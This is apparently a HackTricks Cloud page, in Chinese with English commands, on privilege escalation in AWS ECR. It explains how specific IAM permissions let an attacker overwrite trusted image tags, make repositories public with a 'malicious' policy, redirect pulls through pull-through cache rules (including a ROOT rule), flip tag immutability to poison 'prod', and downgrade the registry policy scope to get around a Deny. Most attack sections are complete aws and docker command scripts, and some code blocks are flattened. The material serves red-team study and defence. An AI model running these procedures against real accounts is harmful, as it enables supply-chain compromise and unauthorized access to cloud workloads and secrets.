AWS - ECR Privesc

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

拥有 ecr:GetAuthorizationToken 和 ecr:BatchGetImage 的攻击者可以登录到 ECR 并下载镜像。

For more info on how to download images:

AWS - ECR Post Exploitation

Potential Impact: 通过拦截流量中的敏感信息导致间接 privesc。

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

拥有上述所有权限的攻击者可以登录到 ECR 并上传镜像。这可以用于在使用这些镜像的其他环境中提升权限。

此外，ecr:PutImage 可用于通过在该标签下上传不同的镜像 manifest 来覆盖现有标签（例如 stable / prod），从而有效劫持基于标签的部署。

当下游消费者按标签部署并在标签更改时自动刷新时，这将尤其具有影响，例如：

Lambda container image functions (PackageType=Image) 引用 .../repo:stable
ECS services / Kubernetes workloads 拉取 repo:prod（未进行 digest 固定）
任何基于 ECR 事件重新部署的 CI/CD

在这些情况下，标签覆盖可能导致消费者环境中的 remote code execution，并提升到该工作负载使用的 IAM 角色的权限（例如具有 secretsmanager:GetSecretValue 权限的 Lambda 执行角色）。

To learn how to upload a new image/update one, check:

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

与前一节类似，但适用于公共仓库。

`ecr:SetRepositoryPolicy`

拥有此权限的攻击者可以更改****仓库的策略，授予自己（或甚至所有人）读/写访问。
例如，在下面的例子中，读取权限被授予所有人。

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

以下是 my-policy.json 的内容:

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "allow public pull",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

与上一节类似，但针对公共仓库。
攻击者可以修改该 ECR Public 仓库的仓库策略，以授予未经授权的公共访问或提升其权限。

# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

潜在影响: 未经授权的公开访问 ECR Public 仓库，允许任何用户 push、pull 或 delete 镜像。

`ecr:PutRegistryPolicy`

具有此权限的攻击者可以更改****注册表策略，以授予其本人、其账户（或甚至所有人）read/write access。

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

ecr:CreatePullThroughCacheRule

滥用 ECR Pull Through Cache (PTC) 规则，将攻击者控制的上游命名空间映射到受信任的私有 ECR 前缀。这样，从私有 ECR 拉取的工作负载会透明地接收攻击者的镜像，而无需向私有 ECR 推送任何内容。

需要的权限: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule。若使用 ECR Public 作为上游：ecr-public:* 用于在公共仓库中创建/推送。
测试过的上游: public.ecr.aws

Steps (example):

在 ECR Public 中准备攻击者镜像

Get your ECR Public alias with: aws ecr-public describe-registries –region us-east-1

docker login public.ecr.aws/<public_alias> docker build -t public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test . docker push public.ecr.aws/<public_alias>/hacktricks-ptc-demo:ptc-test

在私有 ECR 中创建 PTC 规则，将受信任的前缀映射到公共注册表 aws ecr create-pull-through-cache-rule –region us-east-2 –ecr-repository-prefix ptc –upstream-registry-url public.ecr.aws
通过私有 ECR 路径拉取攻击者镜像（未向私有 ECR 推送任何内容） docker login <account_id>.dkr.ecr.us-east-2.amazonaws.com docker pull <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test docker run –rm <account_id>.dkr.ecr.us-east-2.amazonaws.com/ptc/<public_alias>/hacktricks-ptc-demo:ptc-test

Potential Impact: 通过劫持所选前缀下的内部镜像名称，实现供应链妥协。任何通过该前缀从私有 ECR 拉取镜像的工作负载都会收到攻击者控制的内容。

`ecr:PutImageTagMutability`

滥用该权限可将启用了标签不可变性的仓库切换为可变，并用攻击者控制的内容覆盖受信任的标签（例如 latest、stable、prod）。

需要的权限: ecr:PutImageTagMutability 加上推送能力（ecr:GetAuthorizationToken, ecr:InitiateLayerUpload, ecr:UploadLayerPart, ecr:CompleteLayerUpload, ecr:PutImage）。
影响: 通过在不更改标签名称的情况下静默替换不可变标签，实现供应链妥协。

Steps (example):

通过切换可变性来投毒不可变标签

```bash REGION=us-east-1 REPO=ht-immutable-demo-$RANDOM aws ecr create-repository --region $REGION --repository-name $REPO --image-tag-mutability IMMUTABLE acct=$(aws sts get-caller-identity --query Account --output text) aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com # Build and push initial trusted tag printf 'FROM alpine:3.19\nCMD echo V1\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Attempt overwrite while IMMUTABLE (should fail) printf 'FROM alpine:3.19\nCMD echo V2\n' > Dockerfile && docker build -t ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod . && docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Flip to MUTABLE and overwrite aws ecr put-image-tag-mutability --region $REGION --repository-name $REPO --image-tag-mutability MUTABLE docker push ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod # Validate consumers pulling by tag now get the poisoned image (prints V2) docker run --rm ${acct}.dkr.ecr.${REGION}.amazonaws.com/${REPO}:prod ```

通过 ROOT Pull-Through Cache 规则进行全局 registry 劫持

使用特殊的 ecrRepositoryPrefix=ROOT 创建一个 Pull-Through Cache (PTC) 规则，将私有 ECR registry 的根映射到上游公共 registry（例如 ECR Public）。对私有 registry 中不存在的仓库的任何 pull 都会被透明地从上游提供，从而在无需向私有 ECR 推送的情况下实现 supply-chain hijacking。

所需权限: ecr:CreatePullThroughCacheRule, ecr:DescribePullThroughCacheRules, ecr:DeletePullThroughCacheRule, ecr:GetAuthorizationToken.
影响: 对 <account>.dkr.ecr.<region>.amazonaws.com/<any-existing-upstream-path>:<tag> 的拉取将成功并自动创建来自上游的私有仓库。

注意：对于 ROOT 规则，省略 --upstream-repository-prefix。提供它会导致验证错误。

演示 (us-east-1, upstream public.ecr.aws)

```bash REGION=us-east-1 ACCT=$(aws sts get-caller-identity --query Account --output text)

1) Create ROOT PTC rule mapping to ECR Public (no upstream prefix)

aws ecr create-pull-through-cache-rule
–region “$REGION”
–ecr-repository-prefix ROOT
–upstream-registry-url public.ecr.aws

2) Authenticate to private ECR and pull via root path (triggers caching & auto repo creation)

aws ecr get-login-password –region “$REGION” | docker login –username AWS –password-stdin ${ACCT}.dkr.ecr.${REGION}.amazonaws.com

Example using an official mirror path hosted in ECR Public

(public.ecr.aws/docker/library/alpine:latest)

docker pull ${ACCT}.dkr.ecr.${REGION}.amazonaws.com/docker/library/alpine:latest

3) Verify repo and image now exist without any push

aws ecr describe-repositories –region “$REGION”
–query “repositories[?repositoryName==docker/library/alpine]” aws ecr list-images –region “$REGION” –repository-name docker/library/alpine –filter tagStatus=TAGGED

4) Cleanup

aws ecr delete-pull-through-cache-rule –region “$REGION” –ecr-repository-prefix ROOT aws ecr delete-repository –region “$REGION” –repository-name docker/library/alpine –force || true

</details>

### `ecr:PutAccountSetting`（将 `REGISTRY_POLICY_SCOPE` 降级以绕过 registry policy 的 Deny）

滥用 `ecr:PutAccountSetting` 将 registry policy 范围从 `V2`（策略适用于所有 ECR 操作）切换为 `V1`（策略仅适用于 `CreateRepository`、`ReplicateImage`、`BatchImportUpstreamImage`）。如果一个限制性的 registry policy Deny 阻止了像 `CreatePullThroughCacheRule` 这样的操作，降级到 `V1` 会移除该强制，从而让身份策略的 Allow 生效。

- 所需权限：`ecr:PutAccountSetting`, `ecr:PutRegistryPolicy`, `ecr:GetRegistryPolicy`, `ecr:CreatePullThroughCacheRule`, `ecr:DescribePullThroughCacheRules`, `ecr:DeletePullThroughCacheRule`.
- 影响：通过临时将范围设置为 `V1`，能够执行之前被 registry policy Deny 阻止的 ECR 操作（例如创建 PTC 规则）。

步骤（示例）：

<details>
<summary>通过切换到 `V1` 绕过对 `CreatePullThroughCacheRule` 的 registry policy Deny</summary>
```bash
REGION=us-east-1
ACCT=$(aws sts get-caller-identity --query Account --output text)

# 0) Snapshot current scope/policy (for restore)
aws ecr get-account-setting --name REGISTRY_POLICY_SCOPE --region $REGION || true
aws ecr get-registry-policy --region $REGION > /tmp/orig-registry-policy.json 2>/dev/null || echo '{}' > /tmp/orig-registry-policy.json

# 1) Ensure V2 and set a registry policy Deny for CreatePullThroughCacheRule
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION
cat > /tmp/deny-ptc.json <<'JSON'
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenyPTCAll",
"Effect": "Deny",
"Principal": "*",
"Action": ["ecr:CreatePullThroughCacheRule"],
"Resource": "*"
}
]
}
JSON
aws ecr put-registry-policy --policy-text file:///tmp/deny-ptc.json --region $REGION

# 2) Attempt to create a PTC rule (should FAIL under V2 due to Deny)
set +e
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws
RC=$?
set -e
if [ "$RC" -eq 0 ]; then echo "UNEXPECTED: rule creation succeeded under V2 deny"; fi

# 3) Downgrade scope to V1 and retry (should SUCCEED now)
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V1 --region $REGION
aws ecr create-pull-through-cache-rule \
--region $REGION \
--ecr-repository-prefix ptc-deny-test \
--upstream-registry-url public.ecr.aws

# 4) Verify rule exists
aws ecr describe-pull-through-cache-rules --region $REGION \
--query "pullThroughCacheRules[?ecrRepositoryPrefix=='ptc-deny-test']"

# 5) Cleanup and restore
aws ecr delete-pull-through-cache-rule --region $REGION --ecr-repository-prefix ptc-deny-test || true
if jq -e '.registryPolicyText' /tmp/orig-registry-policy.json >/dev/null 2>&1; then
jq -r '.registryPolicyText' /tmp/orig-registry-policy.json > /tmp/_orig.txt
aws ecr put-registry-policy --region $REGION --policy-text file:///tmp/_orig.txt
else
aws ecr delete-registry-policy --region $REGION || true
fi
aws ecr put-account-setting --name REGISTRY_POLICY_SCOPE --value V2 --region $REGION

Tip

学习并练习 AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
学习并练习 GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
学习并练习 Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 subscription plans!

加入 💬 Discord group 或者 telegram group 或关注我们的 Twitter 🐦 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PRs 来分享 hacking tricks。